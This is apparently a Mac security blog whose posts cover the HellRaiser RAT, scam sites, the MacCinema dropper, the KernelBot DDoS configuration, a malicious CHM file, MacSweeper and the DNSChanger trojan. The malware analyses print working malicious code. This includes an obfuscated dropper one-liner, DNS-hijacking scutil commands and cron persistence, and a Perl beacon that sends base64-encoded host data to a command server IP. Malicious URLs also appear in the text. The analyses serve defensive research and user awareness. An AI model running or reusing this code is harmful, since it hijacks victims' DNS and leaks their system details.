iThreats &#8211; Mac Security

RAT for Mac?

When there’s too much RAT (Remote Administration Tool) available for Windows, people wonder if there’s good and useful RAT for Mac as well.

The search and discussions about this topic goes on and on; at one point an online poll favored to continue the development:

A useful description of RATs that works in OSX can be found here.

The most recent/updated development is HellRaiser version 4.2, coded by DCHKG an Underground Mac Programming Team.

HellRaiser includes a configuration component, where the remote controller can specify the server parameters.

The server component is the application distributed to target OS X user. It requires manual execution to install and enable the server to run in background (hidden from dock). Once successful, the server component (or the slave) will report back to the master as shown below.

This is the same version that Intego recently discovered in-the-wild disguised as iPhoto installer.

How would I know if HellRaiser server is installed/running?

option 1: You may open network utility and activity monitor (/Applications/Utilities/) and kill the process.

option 2: You may open terminal, and type lsof -i (this will list running processes and its matching network/internet connection). Search dubious name and internet connection, take note of the PID, and in terminal type kill -9 <PID> (this will kill the process).

If you’re using Mac security scanner, then it’s best time to check for signature update! (most vendors detects this as OSX HellRTS)

Computers

Best Mac Software.com

This fraudulent site attempts to scam gullible Mac users.

Please be careful when shopping online. Here’s simple tips on how to detect suspicious vendors:

1) You can’t find sufficient details to verify the store such as contact number and store location.

2) You can’t find interactive review. Static review such as “Testimonials” page can be easily crafted.

3) Check DNS table of the IP address. Whois provides enough information for you to trace the people behind the suspicious website. In most cases, you’ll find association and history to various forms of fraudulent activities.

Best choice is to buy from known legitimate retailers and online stores. It may be costly, but it assures your online transaction is secured, provides buyer protection and guarantees satisfaction.

Engaging into fraudulent online deals could cause your identity and your money.

Stay safe!

Updated as of 15.01.2010

I received this message from Skype (below) which links to a very similar looking website. Of course, it’s a certified scam.

Computers

Updated Mac Cinema

Last week, I have spotted a modified version of MacCinema. It was not significant, the modification was purely to avoid scanners detection.

The script looks like this:
#!/bin/sh if [ $# != 1 ]; then type=0; else type=1; fi && tail -53 $0 | sed 's/lala/nigeb/' | sed '/\n/!G;s/$.$$.*\n$/&\2\1/;//D;s/.//' | tail -r | uudecode -o /dev/stdout | sed 's/applemac/AdobeFlash/' | sed 's/bsd/7037/' | sed 's/gnu/'$type'/' >`uname -p` && sh `uname -p` && rm `uname -p` && exit dne ` ``@"R5V9IY&(W<S-@H68H)78S178F%F"-EC)95D(&!F*J44,G@214%$*H "%$8X0"*"93505D*U4%+T,44O@2-\@5,F`F0J02(`AB0!!&.B@"2J040PH03M ****content removed**** LU"(B%&=N]F<C!6/T-7:X5F"B,G;)UR9UQ&4@079N)79TY62ODG<A)G8IQT+M BT#:T%&<*(R8AU69L!'<A)2/,ED5%I@(R@C+T8C+S83,N,3,R(2/21$1!!52M agazagiz 666 lala
Anyway, this backdoor trojan is massively distributed around the internet. It uses Google SEO, so most users stumbled to these malicious sites from Google search.

Some lures Mac users promising free downloads of full version softwares, cracks, serials, activators, generators, keys, fixes – just like the screenshot below. crack

…while other links to Mac videos like this PornTube below.

Porntube

There are malware serving sites that is bit aggressive, where it does not ask user to download the DMG files instead it automatically downloads and mounts – as it is turned on by default, you can disable automount by following this instruction:

1. Open Safari

2. Open “Preferences” under the “Safari” menu

3. Click on the “General” tab

4. Un-check the “Open ’safe’ files after downloading” box

5. Close Safari’s preferences

This instruction has been previously discussed here.

Stay safe!

Computers

Bloated Fish

fishoftheday1

This is the picture after visualizing data gathered from one malicious node <75.126.154.249>. Hundred of active domain names shares this IP address as denoted by green line. The red lines inside the body of “Bloated Fish” denotes as malicious links. These red lines is connected to the fish pink and red lips noted as “http://self-relax-massage.com/relax/in.cgi?” As of the moment, the malicious server leads to its payload – “http://great2008x.com/great/pdf.php?id”. This generates an exploited PDF that installs EXE targetting users who’s default browser opens Adobe Reader automatically.

As observed and several times mentioned, these malicious PDFs are quietly increasing in numbers however recently there has been a significant increase due to implementation of PHP PDF – apparently, a server side polymorphism which means that generated PDF changes everytime. This makes difficult for most security scanners that relies on specific file detection.

Notice the fish tail, there is few red lines leading to “MacAccess” trojan. As of writing, they all point to “http://opera-power.com/download/7946645975673d6cc63775/flashcodec.dmg”. As usual, it disguises as a fake codec. Here’s an example below…

picture-2

“These bloated fish calls cloud as their home.”

Latest OS X threat Krowi installs “DivX”

Latest update of threat Krowi was found in Adobe Photoshop cracker installer.

Not much difference with “iWorkServices” except with the repackaging and name. However, this should serve as a reminder to be extra careful in downloading stuff!

krowib strings

Once installed, you’ll find these files and port activity below.

divx

How to Remove? It’s the same as the previous instruction except that you have to change the name from “iWorkServices” to “DivX”.

More Threats Exploiting MS08-067

Few days ago, I have too many question, I was wondering if MS08-067 was just for show or should I say, isolated attack or maybe real blackhat Vxers working on a bigger one. Today, I have answers and unfortunately this wormable vulnerability it seems going in-the-wild.

As seen today, a file “67.exe” contains malcode exploiting MS08-067, which is a vulnerability in RPC request function “NetPathCanonicalize()” found in netapi32.dll.

The code snippet shows that it is capable connect and bind to a remote pipe thereafter sends its payload which is another file named “6767.exe” – a Chinese malware named “KernelBot” known as DDoS bot.

From “6767.exe” code, it obvious that its targeting several security sites by modifying the local host.

This bot then downloads its C&C (command and control) configuration file “cmd.txt” from a remote server which then defines its DDoS attack.

[DDOS_ScriptFlood]
IsScriptFlood=0
CmdID=46
ScriptFloodUrl=http://zhang_231.blog.163.com
ScriptFloodDNS=blog.163.com
ScriptFloodPort=80
IsGetUrlFile=1
ThreadLoopTime=10000
ThreadCount=1
IsTimer=1
Timer=15

[DDOS_UdpFlood]
IsUdpFlood=0
CmdID=9
UdpFloodDNS=222.130.21.3
ThreadCount=6
IsTimer=1
Timer=4

[DDOS_SynFlood]
IsSynFlood=0
CmdID=1
SynFloodDNS=www.bc248.com
SynFloodPort=80
ThreadCount=1
IsTimer=1
Timer=10

[DDOS_TcpFlood]
IsTcpFlood=0
CmdID=26
TcpFloodDNS=
TcpFloodPort=80
IsSendPacket=0
ThreadCount=1
IsTimer=1
Timer=6

The configuration file “cmd.txt” also includes URL where it can download further files: “webcc.exe”, “Loader.exe”, and “67.exe”.

Malicious CHM

I was cleaning up my messy folders when I bumped on this file – chungtak.chm. I reckon, it was the malicious CHM file spreading around early March of this year.

Is this another exploited file ? Let’s take a look …

CHM Basic File Structure

Microsoft’s HTML Help CHM format starts with 38 bytes of header information and then followed by header sections which contains information such as total filesize and directory list.

This header is followed by directory chunks which consist of index and listing chunks.

The content is self explanatory while the section data is actually part of the content which associates other related files. The section data could contain compressed or uncompressed data. The compressed section uses LZX compression method, which is popularly used in Microsoft cabinet files.

[Read Matthew T. Russotto CHM file format]

With this basic information, let’s investigate the suspicious file – chungtak.chm.

1 – Chungtak.chm
2 – Using CHM decoder tool, these files were extracted.
3 – Chungtak.chm main page is Index.htm. Index.htm contains a malicious code that allows music.exe to execute.
4 – music.exe is a Trojan Dropper. A good analysis posted in McAfee Avert Labs Blog last March 11.

So, what happened? The CHM file is not exploited instead the malicious user uses a legitimate feature that allows an external local file execute by linking it to the chm.

Mac Sweeper First Rogue Application in Mac

Beware! First rogue application in Mac is here.

This rogue application displays a fake information, pretending that it is scans the user’s system. It then displays a fake Alert, showing that bad cookies and files were detected.

Once the user click “Remove”, it will download MacSweeperSetup.dmg and install MacSweeper.app – the rogue application.

There are two images or looks that links to this rogue application.

(1) The screenshot shown above is the image displayed when you visit this url:

http://scanner.macsweeper.com/scan.php

(2) The screenshot shown below is the image displayed when you get linked or redirected (Ex. you have been linked from Google.) to this url:

http://scanner.macsweeper.com/scan.php?landid=2&os=macos&depid
=maxc_clr07&cid=2271&parid=mc_346586211

*** This links to rogue site; Use at your own risk! ***

As of this writing, no security scanners detects it.

MacSweeper does not need root admin password to execute the application. In fact it is just a portable application and no installation required. Here’s the screenshot below:

Analysis of OSX Trojan DNS Changer

::::::::::::

File Size
::::::::::::

DMG : ~ 17.1 KB (17,598 bytes)
Installer.pkg : ~132 KB (135,168 bytes)

:::::::::::::::::

Propagation
:::::::::::::::::

This malicious code does not spread and propagate by itself. It uses an ancient yet effective Social Engineering technique to entice users to manually install the program. This trojan disguises as video codec and associates itself to a shared and free download videos. It was first seen and linked to porn sites but later it was also linked to funny videos and seen as splogs (spam blog).Is this in-the-wild ? Yes.

::::::::::::::::::::::::::::::::::

Installation & Behaviour
::::::::::::::::::::::::::::::::::

A user visits a rogue site and download a fake video codec. Check the screenshot here.

The disk image file will be automatically mounted but not extracted. This means, the user has to manually install the downloaded file.

The downloaded installer – Install.pkg, contains the following files:

Info.plist is the first file invoked during the installation. This file contains detailed usage information and behavior such as:

Brief description: Microsoft Company
Application Type: MacVideo
Release Version: 1.0
Authorization Action: RootAuthorization
Default Location: /Library/Internet Plug-Ins/
Installed Size: 60
Restart Action: NoRestart

Followed by Archive.bom, which contain information of files to install.

lsbom -s install.pkg/Contents/Archive.bom
.
./Mozillaplug.plugin
./Mozillaplug.plugin/Contents
./Mozillaplug.plugin/Contents/Info.plist
./Mozillaplug.plugin/Contents/MacOS
./Mozillaplug.plugin/Contents/MacOS/VerifiedDownloadPlugin
./Mozillaplug.plugin/Contents/Resources
./Mozillaplug.plugin/Contents/Resources/VerifiedDownloadPlugin.rsrc
./Mozillaplug.plugin/Contents/Resources/VerifiedDownloadPlugin.rsrc.ROVE
./Mozillaplug.plugin/Contents/Resources/VerifiedDownloadPlugin.rsrc.bak
./Mozillaplug.plugin/Contents/version.plist
./QuickTime.xpt
./plugins.settings
./sendreq

It then access the files description.plist and PkgInfo, which gives the following information:

Version: 1.0
Description: “Its a suppa puppa desc yo”
Title: MacCodec

PkgInfo: pmkrpkg1

Followed by BundleVersions.plist for version informations.

The installer comes with a “License Agreement”. Upon clicking “Continue”, a message box will display requiring the user to click “Agree” to continue the installation process.

Ok, let’s look further on the malicious codes.

Archive.pax.gz, postinstall, postupgrade, preinstall and preupgrade contains shell script that does the dirty works.

Postinstall and postupgrade contains exactly the same code, as well as preinstall and preupgrade.

Preinstall is invoked after the user agreed on the License Agreement. This trojan does not have damaging payloads, except it only modifies users’ DNS setting. Let’s check the code.

:::::::::::::::::::::::

Code Analysis
:::::::::::::::::::::::

Preinstall script:

#!/bin/bash
s1=85.255.115.22
s2=85.255.112.190
path=”/Library/Internet Plug-Ins”
PSID=$( (/usr/sbin/scutil | grep PrimaryService | sed -e ‘s/.*PrimaryService : //’)<

Using Scutil, it retrieves user’s primary network interface.

open
get State:/Network/Global/IPv4
d.show
quit
EOF
)

It then modifies DNS name server IP to s1=85.255.115.22 and s2=85.255.112.190.

/usr/sbin/scutil
open
d.init
d.add ServerAddresses * $s1 $s2
set State:/Network/Service/$PSID/DNS
quit

**Take note: IP addresses may change per variant.

It checks for a crontab file – plugins.settings, in this location “/Library/Internet Plug-Ins”. This file is a marker, it indicates whether this trojan has been previously installed or not.

exist=`crontab -l|grep plugins.settings`

If plugins.settings does not exist (meaning, it was not yet installed), the installation will proceed by dropping a temporary file \cron.inst

if [ “$exist” == “” ]; then
echo “* * * * * \”$path/plugins.settings\”>/dev/null 2>&1″ > cron.inst

Cron.inst has the following strings:

* * * * * “/Library/Internet Plug-Ins/QuickTime.xpt”>/dev/null 2>&1

It will execute cron.inst using Crontab command.

crontab cron.inst

Cron.inst executes another script, Quicktime.xpt. This is found in this location /Library/Internet Plug-Ins/

“/Library/Internet Plug-Ins/QuickTime.xpt”

In background, it will create a temporary file named, 1.

>/dev/null 2>&1

QuickTime.xpt redirects its output to this file instead of popping error or script command to the user’s screen.

Once cron.inst is executed, preinstall script will delete this temporary file.

rm -rf cron.inst
fi

QuickTime.xpt script:

This script is inside Archive.pax.gz. The installation ends by executing cron.inst, which extracts its content to this location /Library/Internet Plug-Ins/.

Like preinstall script, QuickTime.xpt checks for users network information, attempt to modify DNS name server settings, checks the existence of QuickTime.xpt and if exist, it creates cron.inst, execute it and delete temporary file, 1.

Postinstall script:

#!/bin/sh
path=”/Library/Internet Plug-Ins/”
/usr/bin/perl “$path/sendreq”
rm -rf “$path/sendreq”

It executes sendreq, which is a perl script and deletes it.

SendReq Script:

This perl base bot acts as a backdoor client component and communicates to a remote server through socket.

#!/usr/bin/perl
use IO::Socket;

It uses MIME base64 encoding to transmit messages through HTTP.

use integer;
my $eol = $_[1];
$eol = “\n” unless defined $eol;my $res = pack(“u”, $_[0]);
# Remove first character of each line, remove newlines
$res =~ s/^.//mg;
$res =~ s/\n//g;

$res =~ tr|` -_|AA-Za-z0-9+/|; # `# help emacs
# fix padding at the end
my $padding = (3 – length($_[0]) % 3) % 3;
$res =~ s/.{$padding}$/’=’ x $padding/e if $padding;
# break encoded string into lines of no more than 76 characters each
if (length $eol) {
$res =~ s/(.{1,76})/$1$eol/g;
}
return $res;
}

The bot command-and-control server:

my $server=”85.255.121.37″;

**Take note: IP addresses may change per variant.

Executes uname -p command to retrieve victim’s operating system processor type and hostname for the IP address.

my $server=”85.255.121.37″; my $cmd=’uname
my $cmd=’uname -p;echo “;”;hostname’;$cmd=~s/\n//g;

Encode the gathered information, indicating “mac”.

my $uniqid=encode_base64(“mac;”.$cmd); $uniqid=~s/\n//g;

Send a request to remote server.

my $request=”GET / HTTP/1.1\r\nAccept-Language: $unigid\r\nHost: $server\r\n\r\n”;

This bot sends a request to the remote server, attempting to establish a connection through TCP port 80.

my $socket=IO::Socket::INET->new(PeerAddr=>$server,PeerPort=>80,Proto=>”tcp”,timeout=>10) or die();
print $socket $request;
close($socket);

Captured packet looks like this:

It sends victim’s information in base64 encoded strings:

GET / HTTP/1.1 Accept-Language: bWFjO2kzODY7cGMtdG9vbHNzLW1hY2Jvb2stcHJvLTE1LmxvY2Fsx Host: 85.255.121.37

Decoded version:

GET / HTTP/1.1 Accept-Language: mac;i386;xx-toolss-macbook-pro-15.local Host: 85.255.121.37From this information, the C&C (command-and-control) server can determine the total count of infection, IP address and the geographical location of that infected host.

Furthermore, later versions of this trojan scripts are obfuscated making it little difficult for security analyst and researchers to read the code.

::::::::::::::

Conclusion
::::::::::::::::

Trojan DNSChanger is as simple as changing DNS settings – no complication and no destructive behavior. These are simple scripts that are widely available online, built into mac installer and deployed to several existing fake codec domains.The lesson here is that malwares or threats in Mac does not have to be complicated. With the vast information available online, it is possible that an ordinary person without programming background – also called script kiddie, can cause interruption and damage to our daily lives.

Phish Facebook, Phish Myspace too!